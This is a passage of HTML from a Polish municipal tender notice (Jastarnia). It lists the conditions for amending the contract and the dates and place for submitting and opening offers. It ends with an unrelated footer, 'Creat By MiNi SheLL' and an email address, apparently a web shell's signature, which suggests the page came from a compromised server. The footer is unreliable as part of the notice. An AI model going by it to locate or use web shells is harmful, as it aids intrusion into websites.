wprowadzenia: </h3> Zamawiający dopuszcza zmianę zawartej umowy w następujących przypadkach:<br/>-zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie<br/>treści umowy do aktualnego stanu prawnego;<br/>-zwiększenia liczby jednostek realizujących budżet gminy dla których będą prowadzone<br/>rachunki, przy czym w przypadku zwiększenia liczby jednostek warunki umowy dotyczące tej jednostki muszą być tożsame<br/>z warunkami niniejszej umowy.<br/>-waloryzacji wynagrodzenia, tj. pobieranych opłat jedynie w zakresie wskazanym w pkt. 1) Formularza ofertowego jeden raz<br/>w trakcie trwania umowy, jednak nie szybciej niż po 24 miesiącach od daty podpisania umowy i nie o więcej niż 10% w<br/>stosunku do cen podanych w Formularzu ofertowym Wykonawcy. Warunkiem waloryzacji jest wzrost średniorocznego<br/>wskaźnika cen towarów i usług konsumpcyjnych o co najmniej 10 % w stosunku do wskaźnika średniorocznego z 2022 roku. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/jastarnia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-07 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com